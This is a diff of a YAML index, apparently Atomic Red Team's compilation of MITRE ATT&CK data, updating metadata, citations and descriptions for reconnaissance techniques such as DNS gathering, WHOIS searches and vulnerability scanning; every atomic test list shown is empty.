+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Gather Victim Host Information
-      description: |-
-        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
-        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: reconnaissance
-      x_mitre_detection: |-
-        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
-        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.1'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1596.003:
     technique:
@@ -54607,7 +55284,7 @@ reconnaissance:
         url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
         description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
           from Server (Site URL). Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:48:37.628Z'
       name: Digital Certificates
       description: |-
         Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -54623,8 +55300,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.002:
     technique:
@@ -54646,7 +55321,7 @@ reconnaissance:
         url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
         description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
           73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:44:43.900Z'
       name: Purchase Technical Data
       description: |-
         Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -54662,8 +55337,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.005:
     technique:
@@ -54691,7 +55364,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:05.302Z'
       name: IP Addresses
       description: |-
         Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -54707,33 +55380,33 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.002:
     technique:
-      modified: '2022-10-21T14:32:48.393Z'
+      modified: '2024-11-11T16:13:02.196Z'
       name: DNS
       description: |-
-        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
 
         Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
       created: '2020-10-02T15:47:10.102Z'
@@ -54747,18 +55420,29 @@ reconnaissance:
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
         url: https://www.circl.lu/services/passive-dns/
+      - source_name: DNS-CISA
+        description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+          Leak Domain Information. Retrieved June 5, 2024.
+        url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
       - source_name: DNS Dumpster
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
         url: https://dnsdumpster.com/
+      - source_name: Alexa-dns
+        description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+          June 5, 2024.
+        url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
       - source_name: Sean Metcalf Twitter DNS Records
         description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
-          May 27, 2022.
-        url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+          September 12, 2024.
+        url: https://x.com/PyroTek3/status/1126487227712921600
+      - source_name: Trails-DNS
+        description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+          the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+        url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.002:
     technique:
@@ -54779,7 +55463,7 @@ reconnaissance:
       - source_name: WHOIS
         url: https://www.whois.net/
         description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:50:44.113Z'
       name: WHOIS
       description: |-
         Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -54795,39 +55479,37 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1594:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
-      type: attack-pattern
-      created: '2020-10-02T16:51:50.306Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1594
-        url: https://attack.mitre.org/techniques/T1594
-      - source_name: Comparitech Leak
-        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
-        description: Bischoff, P. (2020, October 15). Broadvoice database of more
-          than 350 million customer records exposed online. Retrieved October 20,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-02T18:52:21.278Z'
       name: Search Victim-Owned Websites
-      description: |-
-        Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
-        Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+      description: "Adversaries may search websites owned by the victim for information
+        that can be used during targeting. Victim-owned websites may contain a variety
+        of details, including names of departments/divisions, physical locations,
+        and data about key employees such as names, roles, and contact info (ex: [Email
+        Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+        also have details highlighting business operations and relationships.(Citation:
+        Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+        actionable information. Information from these sources may reveal opportunities
+        for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+        or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+        establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+        or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+        initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+        or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+        to manually browsing the website, adversaries may attempt to identify hidden
+        directories or files that could contain additional sensitive information or
+        vulnerable functionality. They may do this through automated activities such
+        as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+        well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+        Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - James P Callahan, Professional Paranoid
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for suspicious network traffic that could be indicative
         of adversary reconnaissance, such as rapid successions of requests indicative
         of web crawling and/or large quantities of requests originating from a single
@@ -54835,13 +55517,41 @@ reconnaissance:
         Analyzing web metadata may also reveal artifacts that can be attributed to
         potentially malicious activity, such as referer or user-agent string HTTP/S
         fields.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+      created: '2020-10-02T16:51:50.306Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1594
+        external_id: T1594
+      - source_name: Perez Sitemap XML 2023
+        description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+          to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+          2024.
+        url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+      - source_name: Comparitech Leak
+        description: Bischoff, P. (2020, October 15). Broadvoice database of more
+          than 350 million customer records exposed online. Retrieved October 20,
+          2020.
+        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+      - source_name: Register Robots TXT 2015
+        description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+          you don't want them to look. Retrieved July 18, 2024.
+        url: https://www.theregister.com/2015/05/19/robotstxt/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.001:
     technique:
@@ -54866,7 +55576,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:13.409Z'
       name: DNS/Passive DNS
       description: |-
         Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -54882,8 +55592,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.003:
     technique:
@@ -54905,7 +55613,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:38:31.983Z'
       name: Identify Business Tempo
       description: |-
         Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -54921,8 +55629,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.001:
     technique:
@@ -54948,7 +55654,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:32:10.810Z'
       name: 'Gather Victim Host Information: Hardware'
       description: |-
         Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -54966,13 +55672,11 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1592.001
     atomic_tests: []
   T1598.003:
     technique:
-      modified: '2024-04-19T13:26:16.082Z'
+      modified: '2024-05-31T04:18:44.567Z'
       name: Spearphishing Link
       description: |-
         Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55028,7 +55732,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: TrendMictro Phishing
         description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
           October 20, 2020.
@@ -55079,7 +55783,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.004:
     technique:
@@ -55100,7 +55803,7 @@ reconnaissance:
       - source_name: DNS Dumpster
         url: https://dnsdumpster.com/
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:33:02.476Z'
       name: Network Topology
       description: |-
         Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -55116,8 +55819,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.003:
     technique:
@@ -55139,7 +55840,7 @@ reconnaissance:
         url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
         description: García, C. (2019, April 3). Pentesting Active Directory Forests.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:22.917Z'
       name: Network Trust Dependencies
       description: |-
         Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -55155,8 +55856,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.001:
     technique:
@@ -55178,7 +55877,7 @@ reconnaissance:
         url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
         description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
           Intelligence Feeds. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:45:30.862Z'
       name: Threat Intel Vendors
       description: |-
         Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -55194,12 +55893,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589:
     technique:
-      modified: '2024-04-19T04:27:00.005Z'
+      modified: '2024-09-16T16:09:45.794Z'
       name: Gather Victim Identity Information
       description: |-
         Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -55239,8 +55936,8 @@ reconnaissance:
         external_id: T1589
       - source_name: OPM Leak
         description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
       - source_name: Detectify Slack Tokens
         description: Detectify. (2016, April 28). Slack bot token leakage exposing
           business critical information. Retrieved October 19, 2020.
@@ -55285,11 +55982,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:37:31.317Z'
       name: Vulnerability Scanning
       description: |-
         Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -55329,9 +56025,8 @@ reconnaissance:
         url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596:
     technique:
@@ -55393,7 +56088,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595:
     technique:
@@ -55419,7 +56113,7 @@ reconnaissance:
         url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
         description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
           October 20, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T20:58:13.661Z'
       name: Active Scanning
       description: |-
         Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -55440,8 +56134,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.002:
     technique:
@@ -55506,7 +56198,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1598.004:
     technique:
@@ -55554,7 +56245,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.006:
     technique:
@@ -55576,7 +56266,7 @@ reconnaissance:
         url: https://nmap.org/book/firewalls.html
         description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
           and Intrusion Detection Systems. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:54.275Z'
       name: Network Security Appliances
       description: |-
         Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -55592,34 +56282,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
-      type: attack-pattern
-      created: '2020-10-02T16:50:12.809Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1593.002
-        url: https://attack.mitre.org/techniques/T1593/002
-      - source_name: SecurityTrails Google Hacking
-        url: https://securitytrails.com/blog/google-hacking-techniques
-        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-      - source_name: ExploitDB GoogleHacking
-        url: https://www.exploit-db.com/google-hacking-database
-        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
-          October 23, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T19:19:47.758Z'
       name: Search Engines
       description: |-
         Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -55628,15 +56294,38 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+      created: '2020-10-02T16:50:12.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1593/002
+        external_id: T1593.002
+      - source_name: SecurityTrails Google Hacking
+        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+      - source_name: ExploitDB GoogleHacking
